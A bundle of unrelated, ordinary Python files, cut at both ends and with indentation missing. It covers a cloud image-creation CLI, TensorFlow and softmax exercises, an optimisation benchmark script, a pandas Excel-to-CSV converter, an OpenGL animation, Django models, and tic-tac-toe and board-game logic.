def __parse(self):
try:
opts, args = getopt.getopt(sys.argv[1:], \
"hvc:t:s:b:", \
["help", "version", "verbose", \
"conf=", "imagetag=", "imagesize=", "vo=", "number="])
except getopt.GetoptError, err:
print str(err)
self.__usage()
sys.exit(2)
for key, value in opts:
if key in ("-h", "--help"):
self.__usage()
sys.exit()
elif key in ("-c", "--conf"):
self.parameters['conf'] = (True, value)
elif key in ("-b", "--number"):
self.parameters['number'] = int(value)
elif key in ("-t", "--imagetag"):
self.parameters['tag'] = value
elif key in ("-s", "--imagesize"):
self.parameters['size'] = value
elif key == "--vo":
self.parameters['vo'] = value
elif key == "--verbose":
self.verbose = True
elif key in ("-v", "--version"):
self.version = __import__('cli').get_release()
sys.exit()
else:
raise errors.OptionError("unhandled option")
if self.parameters['tag'] == '':
self.__usage()
msg = ("Image tag not specified. Please use the option -t or" +
" --imagetag")
raise errors.NoOptionSpecified(msg)
if self.parameters['size'] not in ('small', 'medium', 'large', 'extralarge'):
self.__usage()
raise errors.OptionError("Image size wrong")
def doWork(self):
self.__parse()
if not self.parameters['conf'][0]:
user_config_file = \
get_config.ConfigurationFileLocation(\
file_name = self.parameters['conf'][1]).get_configuration_file()
else:
user_config_file = \
get_config.ConfigurationFileLocation(\
file_name = self.parameters['conf'][1]).get_custom_configuration_file()
load_user_data = \
load_config.LoadUserConfig(\
config_file = user_config_file).load_user_data()
obj = create_occi.CreateImage(\
load_user_data, self.parameters)
if self.verbose:
print obj.get_command()
count = 0
location_image = {}
while count < self.parameters['number']:
res, msg = obj.get_output()
location_image[count] = (res, msg)
count += 1
for key, value in location_image.iteritems():
if value[1] == '':
for x in value[0]:
if 'Location: ' in x:
print x.split('Location: ')[1]
break
else:
print value[1]
if __name__ == '__main__':
try:
a = CreateImage()
a.doWork()
except get_config.NoFileFound, err:
print '\n\nExecution: ', err
except get_config.NoPathFound, err:
print '\n\nExecution: ', err
except load_config.WrongConfigurationFile, err:
print '\n\nExecution: ', err
except load_config.WrongConfigurationSettings, err:
print '\n\nExecution: ', err
except checks.NoCmdFound, err:
print '\n\nExecution: ', err
except errors.OptionError, err:
print '\n\nExecution: ', err
except errors.NoOptionSpecified, err:
print '\n\nExecution: ', err
except load_config.GeneralError, err:
print '\n\nExecution: ', err
except create_occi.CreateImageError, err:
print '\n\nExecution: ', err
except KeyboardInterrupt:
print '\n\nExecution n!'
sys.exit(1)
|
# 2017-03-11 jkang
# practice tf.case
# ref: http://web.stanford.edu/class/cs20si
import tensorflow as tf
x = tf.random_uniform([], -2, 2)
y = tf.random_uniform([], -2, 2)
def f1():
return tf.add(x, y)
def f2():
return tf.sub(x, y)
def f3():
return tf.constant(0, dtype=tf.float32)
val = tf.case({tf.less(x, y): f2, tf.greater(x, y): f1},
default=f3, exclusive=True)
sess = tf.InteractiveSession()
print(sess.run(tf.less(x, y)))
print(sess.run(tf.greater(x, y)))
print(sess.run(val))
sess.close()
|
"""import matplotlib.pyplot as plt
import numpy as np
import NSGAII
import Solution as sl
import SPEAII
import NSPSO
import Problem
import ParetoUtil as pu
import NSPSOMM
import concurrent.futures
def main():
problemlist = [Problem.UF1(),Problem.UF2(),Problem.UF3(),Problem.UF4()] #Problem.ZDT1(), Problem.ZDT2(), Problem.ZDT3(), Problem.ZDT4(),
populationSizelist = [40]#[12, 40, 60, 100, 1000]
generationCountlist = [100]#[50, 100, 500, 1000]
mutationRate = 0.2
corssoverRate = 0.7
initSolution = None
# Resultplot("",True,problem,initSolution)
for populationSize in populationSizelist:
for generationCount in generationCountlist:
for i in range(1):
with concurrent.futures.ThreadPoolExecutor() as executor:
NSGAMMResult = []
SPEAMMResult = []
NSPSOResult = []
NSPSOMMResult = []
initSolution = sl.solution.CreatePopulation(populationSize, problemlist[0])
futureNSGAMM1 = executor.submit(NSGAII.NSGAII(problemlist[0], popSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureSPEAMM1 = executor.submit(SPEAII.SPEAII(problemlist[0], popSize=populationSize, eliteSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureNSPSO1 = executor.submit(NSPSO.NSPSO(problemlist[0], popSize=populationSize).Evolve, generationCount, initSolution)
futureNSPSOMM1 = executor.submit(NSPSOMM.NSPSOMM(problemlist[0], popSize=populationSize).Evolve, generationCount, initSolution)
initSolution = sl.solution.CreatePopulation(populationSize, problemlist[1])
futureNSGAMM2 = executor.submit(NSGAII.NSGAII(problemlist[1], popSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureSPEAMM2 = executor.submit(SPEAII.SPEAII(problemlist[1], popSize=populationSize, eliteSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureNSPSO2 = executor.submit(NSPSO.NSPSO(problemlist[1], popSize=populationSize).Evolve, generationCount, initSolution)
futureNSPSOMM2 = executor.submit(NSPSOMM.NSPSOMM(problemlist[1], popSize=populationSize).Evolve, generationCount, initSolution)
initSolution = sl.solution.CreatePopulation(populationSize, problemlist[2])
futureNSGAMM3 = executor.submit(NSGAII.NSGAII(problemlist[2], popSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureSPEAMM3 = executor.submit(SPEAII.SPEAII(problemlist[2], popSize=populationSize, eliteSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureNSPSO3 = executor.submit(NSPSO.NSPSO(problemlist[2], popSize=populationSize).Evolve, generationCount, initSolution)
futureNSPSOMM3 = executor.submit(NSPSOMM.NSPSOMM(problemlist[2], popSize=populationSize).Evolve, generationCount, initSolution)
initSolution = sl.solution.CreatePopulation(populationSize, problemlist[3])
futureNSGAMM4 = executor.submit(NSGAII.NSGAII(problemlist[3], popSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureSPEAMM4 = executor.submit(SPEAII.SPEAII(problemlist[3], popSize=populationSize, eliteSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureNSPSO4 = executor.submit(NSPSO.NSPSO(problemlist[3], popSize=populationSize).Evolve, generationCount, initSolution)
futureNSPSOMM4 = executor.submit(NSPSOMM.NSPSOMM(problemlist[3], popSize=populationSize).Evolve, generationCount, initSolution)
NSGAMMResult.append(futureNSGAMM1.result())
SPEAMMResult.append(futureSPEAMM1.result())
NSPSOResult.append(futureNSPSO1.result())
NSPSOMMResult.append(futureNSPSOMM1.result())
NSGAMMResult.append(futureNSGAMM2.result())
SPEAMMResult.append(futureSPEAMM2.result())
NSPSOResult.append(futureNSPSO2.result())
NSPSOMMResult.append(futureNSPSOMM2.result())
NSGAMMResult.append(futureNSGAMM3.result())
SPEAMMResult.append(futureSPEAMM3.result())
NSPSOResult.append(futureNSPSO3.result())
NSPSOMMResult.append(futureNSPSOMM3.result())
NSGAMMResult.append(futureNSGAMM4.result())
SPEAMMResult.append(futureSPEAMM4.result())
NSPSOResult.append(futureNSPSO4.result())
NSPSOMMResult.append(futureNSPSOMM4.result())
for i in range(len(problemlist)):
locations =[]
Delta = []
GD = []
IGD = []
locations.append((problemlist[i].perfect_pareto_front(),"","-","",1))
plotTitle = "Population Size %d, Generation Count %d, Function %s" % (
populationSize,
generationCount,
type(problemlist[i]).__name__,
)
with open( "NSPSO-NSGA-UFTest.txt", "a") as text_file:
print(plotTitle, file=text_file)
locations.append((pu.GetPopulationLocations(NSGAMMResult[i][0]),"NSGAIIMM","","1",1))
Delta.append((NSGAMMResult[i][1][:,[0,1]],"NSGAIIMM","-","",1))
GD.append((NSGAMMResult[i][1][:,[0,2]],"NSGAIIMM","-","",1))
IGD.append((NSGAMMResult[i][1][:,[0,3]],"NSGAIIMM","-","",1))
locations.append((pu.GetPopulationLocations(SPEAMMResult[i][0]),"SPEAIIMM","","P",1))
Delta.append((SPEAMMResult[i][1][:,[0,1]],"SPEAIIMM","-","",1))
GD.append((SPEAMMResult[i][1][:,[0,2]],"SPEAIIMM","-","",1))
IGD.append((SPEAMMResult[i][1][:,[0,3]],"SPEAIIMM","-","",1))
locations.append((pu.GetPopulationLocations(NSPSOResult[i][0]),"NSPSO","","x",1))
Delta.append((NSPSOResult[i][1][:,[0,1]],"NSPSO","-","",1))
GD.append((NSPSOResult[i][1][:,[0,2]],"NSPSO","-","",1))
IGD.append((NSPSOResult[i][1][:,[0,3]],"NSPSO","-","",1))
locations.append((pu.GetPopulationLocations(NSPSOMMResult[i][0]),"NSPSOMM","",".",1))
Delta.append((NSPSOMMResult[i][1][:,[0,1]],"NSPSOMM","-","",1))
GD.append((NSPSOMMResult[i][1][:,[0,2]],"NSPSOMM","-","",1))
IGD.append((NSPSOMMResult[i][1][:,[0,3]],"NSPSOMM","-","",1))
with open("NSPSO-NSGA-UFTest.txt", "a") as text_file:
for i in range(len(Delta)):
print("Metric {0}\t{1}\t{2}\t{3}".format(Delta[i][1],Delta[i][0][-1,1],GD[i][0][-1,1],IGD[i][0][-1,1]), file =text_file )
Resultplot(plotTitle + ' - Delta' , False, Delta)
Resultplot(plotTitle + ' - GD' , False, GD)
Resultplot(plotTitle + ' - IGD' , False, IGD)
Resultplot(plotTitle, False, locations)
def Resultplot(title, showPlot, dataList):
fig = plt.figure()
plt.title(title)
for dataV in dataList:
plt.plot(
dataV[0][:, 0],
dataV[0][:, 1],
linestyle=dataV[2],
marker=dataV[3],
label=dataV[1],
alpha=dataV[4])
plt.legend()
plt.grid()
if showPlot:
plt.show()
else:
plt.savefig(title + ".pdf")
if __name__ == "__main__":
main()
"""
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 9 00:00:27 2018
@author: Home
"""
import numpy as np
# Write a function that takes as input a list of numbers, and returns
# the list of values given by the softmax function.
def softmax(L):
expl = np.exp(L)
sumE = sum(expl)
result =[]
for i in expl:
result.append(i*1.0/sumE)
return result
|
from aiogram import types
nazad = types.InlineKeyboardMarkup(
inline_keyboard=[
[
types.InlineKeyboardButton(text="<-- Назад", callback_data="Назад8")
]
])
|
import datetime
import calendar
import cx_Oracle
import sys
import os
from datetime import timedelta, date, time
import csv
import pandas as pd
from pandas import DataFrame
import numpy as np
from matplotlib import style
filename = 'output.csv'
target = open(filename, 'w')
#excelData = pd.ExcelFile('Lindsey Done With Adjustments Altered.xlsx')
df = pd.read_excel('Lindsey Done With Adjustments Altered.xlsx', sheet_name='CIM 2016')
index_of_columns = df.columns
list = len(df.columns.tolist())
length_of_columns = len(index_of_columns)
print "*" * 36
print "list " + str(list)
index_of_rows = df.index
print "length of rows " + str(len(index_of_rows))
length_of_rows =(len(index_of_rows))
print "A" * 36
#index_of_columns = df.columns
print "index_of_columns "+ str(index_of_columns)
print "type index_of_columns "+str(type(index_of_columns))
print type(index_of_columns[0])
print type(index_of_columns[1])
print type(index_of_columns[2])
print (index_of_columns[0])
print (index_of_columns[1])
print (index_of_columns[2])
print (index_of_columns[-1])
#for i in range(0, )
target.write("M,CORE_FORECAST,CORE_FORECAST_DESC,WEEKS,,30,30,NJW,N\n")
for x in range(1, length_of_columns):
for i in range(0, length_of_rows):
row_value = df.at[index_of_rows[i], index_of_columns[0]]
date_value = index_of_columns[x].strftime("%d-%b-%Y").upper().split(' ')[0]
#date_value = date_value.strftime("%d-%b-%Y").upper()
#date_value2 = str(date_value).split(' ')[0].upper()
data_value = df.at[index_of_rows[i], index_of_columns[x]]
target.write("D,COREFCST,COREFCST_DESC,,"+str(row_value)+","+ str(date_value).upper()+","+ str(date_value).upper()+","+ str(data_value)+",N\n")
#date_value = date_value.split(' ')[0]
print "B" * 36
print "index_of_rows " + str(index_of_rows)
label = df.index[0]
print label
lst = df.index.tolist()
print "lst " + str(lst)
print lst[-1]
print "rows " + str(index_of_rows)
print index_of_rows[0]
print index_of_rows[1]
print type(index_of_rows)
print type(index_of_rows[0])
print type(index_of_rows[1])
print "C" * 36
print "Let's access some cells"
#value = df.at['row','col']
#value2 = df.loc['row','col']
value = df.at[index_of_rows[0], index_of_columns[0]]
print "1 is " + str(value)
value2 = df.loc[index_of_rows[0], index_of_columns[2]]
print "2 is " + str(value2)
datey = index_of_columns[2]
value3 = df.loc[index_of_rows[0], datey]
print "3 is " + str(value3)
'''
target.write("++++++++++++++++++++++++++++++++++++Begin Run+++++++++++++++++++++++++++++++++++++++\n")
target.write("\n")
target.write("\n")
value = df.at[index_of_rows[0], index_of_columns[0]]
print "1 is " + str(value)
allDates = list(df.columns[1:])
print "All Dates"
allDates = list(df.columns[1:])
#print allDates[0].now().date()#.format("%d.%b.%Y")
small = allDates[0].now().date()
#then = datetime.datetime.strptime(when, '%Y-%m-%d').date()
#adjusted = datetime.datetime.strptime(str(small), '%d-%b-%Y').date()
small = small.strftime("%d-%b-%Y").upper()
print "small = " + str(small)
#datetime.datetime.now().date()
print "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
#value = df.at(0,12).values
#Item 04/04/16
#B03934 S4AAMM 7
print df.index
for index, row in df.iterrows():
print('index: ', index)
print "*********"
print('row: ', row)
print "---------"
target.write(str(row[0]))
#allRows = pd.DataFrame(df.row)
#print allRows
vv2 = df.iloc[1,1]
#vv2 = df.loc['2','04/04/16']
print "Vv2 = " + str(vv2)
print "ddddddddddddddddddddddddddddddddddddddddddddd"
'''
print "++++++++++++++++++++++++++++++++++++++++End Run"
'''
df2 = pd.DataFrame({0: [3]});df2
#pd.Timestamp('20140202')})
i = 0
#date = time.strftime("%x")
#print df
d={}
d['CIM 2016'] = df
#print d
#print "MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM"
#print df.head(1)
#print "MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM"
df2.insert(0,"M","D")
df2.insert(1,"Forecast Name","COREFCST")
df2.insert(2,"Description","Current Forecast")
df2.insert(3,"Demand Class","")
#df["M"] ="D"
#df.head()
#print "mmsmdajondasjindasdnasdno " + str(matrix)
#for rowy in matrix:
# print "rowy" + str(rowy) + "\n"
#print "/////////////////////////////////////////"
#print "df.columns\n"
#print df.columns[1:]
#print df.columns
allDates = list(df.columns[1:])
#print allDates
#print df.index[1]
#print "\n+++++++++++++++++++++++++++++++++++++++++++++++++++\n"
#print df.T
#print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
#print "df.values\n"
#print df.values
#print "df.index\n"
#print df.index
df.to_excel('ForEBS.xlsx',sheet_name='Logility Results')
#print "000000000000000000000000000000000000000000000000000000000000000000"
#print df2
df2.to_excel('Final EBS.xlsx',sheet_name='Logility Results')
for row in df.iterrows():
# iterate through all elements in the row
if (i >= 3):
break
#print "row" + str(row) + "\n"
#print "CMCMCmcmcmcmcmcmcmcmcmc\n"
#print "row" + str(row[1]) + "\n"
#Divide up the columns
vvDate = str(row[1]).split()
#for cc in vvDate:
# print "CC" + str(vvDate)
# print "row" + str(row) + "\n"
# print "CMCMC" + str(row[0])
# print "mmmm" + str(row[1])
#print str(row[2])
# array = [str(row[1]).split(' ')]
#print "ooooooooooooooooooooooooo\n"
#print str(array[0])
#print "\njjjjjjjjj\n"
#print array[1] + "\n"
#print array[2] + "\n"
i+=1
target.write("\n")
target.write("\n")
print "And finally, we close it."
'''
target.close()
|
import argparse
def arguments_parser_log_analysis():
"""Parses command-line arguments for log analysis.
Returns:
argparse.ArgumentParser: Argument parser for training
"""
parser = argparse.ArgumentParser()
parser.add_argument('--log-level', nargs='?', type=str,
default="INFO", const="INFO",
help="Logging level. Can take values among ['DEBUG',"
"'INFO', 'WARNING', 'ERROR', 'CRITICAL']",
dest='log_level')
parser.add_argument('--log-directories', nargs='?', type=str,
default="", const="",
help="Directories containing log files.",
dest='log_directories')
return parser
def arguments_parser_training_data():
"""Parses command-line arguments for log analysis.
Returns:
argparse.ArgumentParser: Argument parser for training
"""
parser = argparse.ArgumentParser()
parser.add_argument('--log-level', nargs='?', type=str,
default="INFO", const="INFO",
help="Logging level. Can take values among ['DEBUG',"
"'INFO', 'WARNING', 'ERROR', 'CRITICAL']",
dest='log_level')
parser.add_argument('--log-directories', nargs='?', type=str,
default="", const="",
help="Directories containing log files.",
dest='log_directories')
parser.add_argument('--generate-full-pos', nargs='?', type=str,
default="", const="",
help="File where positive training data-points "
"generated in the IFTTT corpus format.",
dest='generate_full_pos')
parser.add_argument('--generate-t-channel-neg', nargs='?', type=str,
default="", const="",
help="File where negative training data-points "
"generated for Trigger Channel model should be "
"written to, if specified.",
dest='generate_t_channel_neg')
parser.add_argument('--generate-a-channel-neg', nargs='?', type=str,
default="", const="",
help="File where negative training data-points "
"generated for Action Channel model should be "
"written to, if specified.",
dest='generate_a_channel_neg')
parser.add_argument('--generate-t-fn-neg', nargs='?', type=str,
default="", const="",
help="File where negative training data-points "
"generated for Trigger Function model should be "
"written to, if specified.",
dest='generate_t_fn_neg')
parser.add_argument('--generate-a-fn-neg', nargs='?', type=str,
default="", const="",
help="File where negative training data-points "
"generated for Action Function model should be "
"written to, if specified.",
dest='generate_a_fn_neg')
parser.add_argument('--generate-t-fn-pos', nargs='?', type=str,
default="", const="",
help="File where positive training data-points "
"generated for Trigger Function model should be "
"written to, if specified.",
dest='generate_t_fn_pos')
parser.add_argument('--generate-a-fn-pos', nargs='?', type=str,
default="", const="",
help="File where positive training data-points "
"generated for Action Function model should be "
"written to, if specified.",
dest='generate_a_fn_pos')
return parser
def model_on_logs_arguments_parser():
"""Parses command-line arguments for running models on dialog logs.
Returns:
argparse.ArgumentParser: Argument parser for training
"""
parser = argparse.ArgumentParser()
parser.add_argument('--log-level', nargs='?', type=str,
default="INFO", const="INFO",
help="Logging level. Can take values among ['DEBUG',"
"'INFO', 'WARNING', 'ERROR', 'CRITICAL']",
dest='log_level')
parser.add_argument('--alpha', nargs='?', type=float,
default=0.85, const=0.85,
help="Threshold of confidence above which the slot is "
"deemed as confidently-filled without a need for "
"confirmation.", dest='alpha')
parser.add_argument('--beta', nargs='?', type=float,
default=0.25, const=0.25,
help="Threshold of confidence above which -- and below"
" alpha -- above which the slot is explicitly "
"confirmed before being accepted", dest='beta')
parser.add_argument('--log-directories', nargs='?', type=str,
default="", const="",
help="Directories containing log files.",
dest='log_directories')
return parser
|
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import numpy as np
from math import *
x=0
f=True
z=0
def myinit():
glMatrixMode(GL_PROJECTION)
glClearColor(1,1,1,1)
glClear(GL_COLOR_BUFFER_BIT)
gluPerspective(60,1,.1,50)
gluLookAt(10,10,10,0,0,0,0,1,0)
def draw():
glClear(GL_COLOR_BUFFER_BIT)
global x
global f
global z
glMatrixMode(GL_MODELVIEW)
#kber
glLoadIdentity()
glColor3f(0,0,0)
glTranslate(x,0,0)
glScale(1,.25,.5)
glutWireCube(5)
#so8ayr
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(0,1.25,0)
glScale(.5,.25,.5)
glutWireCube(5)
glColor(1,0,1)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(2,-.5,1.25)
glRotate(z,0,0,1)
glutWireTorus(.125,.5,12,8)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(-2,-.5,-1.25)
glRotate(z,0,0,1)
glutWireTorus(.125,.5,12,8)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(2,-.5,-1.25)
glRotate(z,0,0,1)
glutWireTorus(.125,.5,12,8)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(-2,-.5,1.25)
glRotate(z,0,0,1)
glutWireTorus(.125,.5,12,8)
glColor(1,1,0)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(2.2,-.3,.4)
glScale(.25,1,1)
glutSolidSphere(.3,20,20)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(2.2,-.3,-.4)
glScale(.25,1,1)
glutSolidSphere(.3,20,20)
if x > 7:
f = False
if x < -14:
f = True
if f:
x+=.01
z-=1
else:
x-=.01
z+=1
glFlush()
glutInit()
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(600,600)
glutCreateWindow(b" animated tribute for Deadmau5")
myinit()
glutDisplayFunc(draw)
glutIdleFunc(draw)
glutMainLoop()
|
#!/usr/bin/env python
PACKAGE = "hektar"
from dynamic_reconfigure.parameter_generator_catkin import *
gen = ParameterGenerator()
gen.add("target_pot", int_t, 0, "target position for the arm", 250, 0, 1023)
exit(gen.generate(PACKAGE, "hektar", "pid"))
|
from django.db import models
from django.contrib.sitemaps import ping_google
class Project(models.Model):
title = models.CharField(max_length=200, help_text="The title of the project")
slug = models.SlugField(help_text="Slug to use in the URL for the project")
teaser = models.TextField(help_text="Short description of the project for use in listings")
body = models.TextField(help_text="Full description of the project")
start_date = models.DateTimeField(help_text="Project start date", blank=True, null=True)
end_date = models.DateTimeField(help_text="Project end date", blank=True, null=True)
source_code = models.URLField(help_text="Url to source repository, or project hosting page", blank=True)
def save(self, force_insert=False, force_update=False):
super(Project, self).save(force_insert, force_update)
try:
ping_google()
except:
pass
@models.permalink
def get_absolute_url(self):
return("project_detail",(),{'slug': self.slug})
def __unicode__(self):
return self.title
class Meta:
ordering = ['title']
def has_summary(self):
""" Checks to see if the project has any summary information """
if self.start_date or self.end_date or self.source_code:
return True
else:
return False
|
"""
functions related to creating, printing,
and evaluating tic-tac-toe boards
:author: Ian Sulley
:note: I affirm that I have carried out the attached academic endeavors with full academic honesty,
in accordance with the Union College Honor Code and the course syllabus
"""
def remove_blank_lines(list_of_strings):
"""
Given a list of strings, return a copy
with all empty strings removed
:param list_of_strings: list of strings, some of which may be ''; this list is unchanged
:return: list identical to list_of_strings, but all empty strings removed
"""
result = list()
for s in list_of_strings:
if s != '':
result.append(s)
return result
def get_board_from_file(filename):
"""
Reads board, returns a list of rows.
:param filename: text file with a tic-tac-toe board such as
X X X
O X O
X O O
where each line is one row
:return: list of strings where each string is a
row from filename; any blank lines in the file are removed
Example: ["X X X", "O X O", "X O O"]
"""
board_list = []
board_file = open(filename, "r")
for line in board_file:
board_list.append(line.strip())
board_file.close()
board_list = remove_blank_lines(board_list)
return board_list
def print_row(row):
"""
Nicely prints a row of the board.
:param row: string of Xs and Os
"""
nice_row = ''
for i in range(0, len(row)):
nice_row += row[i]
if i != len(row) - 1:
nice_row += ' | '
print(nice_row)
def print_board(board):
"""
prints the tic-tac-toe board
:param board: list of rows
"""
for i in range(0, len(board)):
row = board[i]
print_row(row)
if i != len(board) - 1:
print('----------')
def three_in_row(board, player, start_x, start_y, dx, dy):
"""
Determines if a player has three in a row, starting
from a starting position (start_x, start_y) and going
in the direction indicated by (dx, dy). Example:
(start_x, start_y) = (2,2) means we start at the lower
right (row 2, col 2). (dx, dy) = (-1, 0) means the next
square we check is (2+dx, 2+dy) = (1,2). And the last
square we check is (1+dx, 2+dy) = (0,2). So we've just
checked the rightmost column - (2,2), (1,2), and (0,2).
:param board: list of rows
:param player: string -- either "X" or "O"
:param start_x: row to start checking at; first row is row 0
:param start_y: col to start checking at; first col is col 0
:param dx: 1 if checking downward, -1 if checking upward, 0 if checking this row
:param dy: 1 if checking rightward, -1 if checking leftward, 0 if checking this col
"""
x = start_x
y = start_y
for i in range(0, 3):
if board[x][y] != player:
return False
x += dx
y += dy
return True
def is_winner(board, player):
"""
Returns True if and only if the given player has won.
:param board: list of row strings
:param player: string - "X" or "O"
:return: True if player won; False if player lost or tied
"""
if (three_in_row(board, player, 0, 0, 1, 1)
or three_in_row(board, player, 0, 2, 1, -1)):
return True
else:
for i in range(0, 3):
if (three_in_row(board, player, 0, i, 1, 0)
or three_in_row(board, player, i, 0, 0, 1)):
return True
return False
def get_winner(board):
"""
Returns the name of the winner, or None if there is no winner
:param board: list of row strings
:return: "X" if X is winner, "O" if O is winner, None if tie
"""
if is_winner(board, 'X'):
return 'X'
elif is_winner(board, 'O'):
return 'O'
else:
return None
def confirm_result(board, expected_winner):
"""
Checks that the computed result matches the expected result.
:param board:list of row strings
:param expected_winner: Correct winner that should occur
:return: "PASS" if computed matches expected result and "FAIL" and the correct winner, if the result does nat match.
"""
if (get_winner(board) == expected_winner
or get_winner(board) == None):
print("PASS")
else:
print("FAIL")
print("Should have returned " + expected_winner + " wins")
def test_all(board_files):
"""
Iterates through all boards and computes their solutions.
Calls print_board(), get_winner() and confirm_result for each.
:param board_files: list of txt files or lists of lists constaining tic tak toe board
:return: calls confirm_result to state if it is a PASS or Fail
"""
if isinstance(board_files[0][0], str):
i = 0
for file in board_files:
board = get_board_from_file(file[0])
"""
I commented this section out for if you want to print out the boards and calculated results.
By default it only tells you if you PASS or FAIL confirm_result()
print_board(board)
winner = get_winner(board)
print("Result: %s wins" % (str(winner)))
"""
confirm_result(board, board_files[i][1])
i += 1
else:
i = 0
for board in board_files:
"""
I commented this section out for if you want to print out the boards and calculated results.
By default it only tells you if you PASS or FAIL confirm_result()
print_board(board[0])
winner = get_winner(board[0])
print("Result: %s wins" % (str(winner)))
"""
confirm_result(board[0], board_files[i][1])
i += 1
def main():
"""
contains list of tuples which each contain
(board_file, expected result)
:return: calls test_all(board_files)
"""
board_files = [
("X_wins.txt" , "X"),
("X_wins2.txt" , "X"),
("X_wins3.txt" , "X"),
("O_wins.txt" , "O"),
("O_wins2.txt" , "O"),
("Tie1.txt" , None)
]
test_all(board_files)
def main2():
"""
constains list of tuples with each tuple containing
(hardcoded_board, expected result)
:return: calls test_all(hardcoded_boards)
"""
Xwins_board = [
"XXX",
"OOX",
"XXO"
]
Xwins2_board = [
"XOX",
"XXO",
"OOX"
]
Xwins3_board = [
"OOX",
"XOX",
"OXX"
]
Owins_board = [
"OOO",
"OXX",
"XXO"
]
Owins2_board = [
"XXO",
"XOO",
"OXX"
]
Tie_board = [
"OXO",
"XXO",
"OOX"
]
hardcoded_boards = [
(Xwins_board , "X"),
(Xwins2_board, "X"),
(Xwins3_board , "X"),
(Owins_board , "O"),
(Owins2_board , "O"),
(Tie_board , None)
]
test_all(hardcoded_boards)
if __name__ == "__main__":
main()
|
class Board:
flower_space = "X"
none_space = "--"
column_space = " | "
empty_space = "O"
tiles = [[]]
player_path_row_column = {}
player_path_row_column[1] = {
1: [3, 0],
2: [2, 0],
3: [1, 0],
4: [0, 0],
5: [0, 1],
6: [1, 1],
7: [2, 1],
8: [3, 1],
9: [4, 1],
10: [5, 1],
11: [6, 1],
12: [7, 1],
13: [7, 0],
14: [6, 0],
15: [5,0]
}
player_path_row_column[2] = {
1: [3, 2],
2: [2, 2],
3: [1, 2],
4: [0, 2],
5: [0, 1],
6: [1, 1],
7: [2, 1],
8: [3, 1],
9: [4, 1],
10: [5, 1],
11: [6, 1],
12: [7, 1],
13: [7, 2],
14: [6, 2],
15: [5,2]
}
def __init__(self, h, w):
self.tiles = [[self.empty_space for x in range(w)] for y in range(h)]
self.tiles[0][0] = self.flower_space
self.tiles[0][2] = self.flower_space
self.tiles[4][0] = self.none_space
self.tiles[5][0] = self.none_space
self.tiles[4][2] = self.none_space
self.tiles[5][2] = self.none_space
self.tiles[3][1] = self.flower_space
self.tiles[6][0] = self.flower_space
self.tiles[6][2] = self.flower_space
self.last_tile_location = len(self.player_path_row_column[1])
def to_text(self):
display = ""
for i in range(0, len(self.tiles)):
for j in range(0, len(self.tiles[i])):
if j != 0:
display = display + self.column_space
display = display + self.tiles[i][j]
display = display + "\n"
return display
def place_token(self, token, location):
row_column = {}
row_column = self.get_player_path(token)
if location not in row_column:
raise Exception(
"place_token error. self: {0} token: {1} location{2}".format(
self, token, location
)
)
if location == self.last_tile_location :
return # we can pretend that we move it by not updating that board peice
row_index = row_column[location][0]
column_index = row_column[location][1]
self.tiles[row_index][column_index] = token.owner_symbol
def get_player_path(self, token):
if token.owner == "Player 1":
return self.player_path_row_column[1]
elif token.owner == "Player 2":
return self.player_path_row_column[2]
else :
raise Exception("get_player_path error {0}".format(token))
"""
Returns the place on the board that a players tokens are e.g. 1-14
"""
def find_all_player_locations(self, token):
location_list = []
player_path = self.get_player_path(token)
for k,v in player_path.items():
row = v[0]
col = v[1]
if self.tiles[row][col] == token.owner_symbol:
location_list.append(self.find_location_from_coord(token, row, col))
return location_list
def find_location_from_coord(self,token, i, j):
if token.owner == "Player 1":
for k,v in self.player_path_row_column[1].items():
if v[0] == i and v[1]==j:
return k
elif token.owner == "Player 2":
for k,v in self.player_path_row_column[2].items():
if v[0] == i and v[1]==j:
return k
else :
raise Exception("find_location_from_coord error finding owner {0} for coord {1}:{2}".format(token, i, j))
def place_token_is_valid(self, token, location):
if location == 0:
return False
row_column = {}
row_column = self.get_player_path(token)
if location not in row_column:
return False
row = row_column[location][0]
column = row_column[location][1]
if self.tiles[row][column] in [token.owner_symbol]:
return False
return True
def reset_tile(self, token, location):
player_path = self.get_player_path(token)
if location not in player_path:
raise Exception("reset_tile error {0} - {1}".format(token, location))
coordinate_to_reset = player_path[location]
row = coordinate_to_reset[0]
col = coordinate_to_reset[1]
flower_spaces = [
[0,0],
[0,2],
[3,1],
[6,2]
]
if coordinate_to_reset in flower_spaces :
self.tiles[row][col] = self.flower_space
return
else :
self.tiles[row][col] = self.empty_space
|
# Generated by Django 3.0.2 on 2020-02-13 14:34
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Profile', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='profile',
old_name='aellido_paterno',
new_name='apellido_paterno',
),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
from analyse_immo.database import Database
from analyse_immo.bien_immo import Bien_Immo
from analyse_immo.lot import Lot
from analyse_immo.charge import Charge
from analyse_immo.credit import Credit
from analyse_immo.impots.annexe_2044 import Annexe_2044
@unittest.skip('fixme')
class TestImpotRegimeReel(unittest.TestCase):
def setUp(self):
self._database = Database()
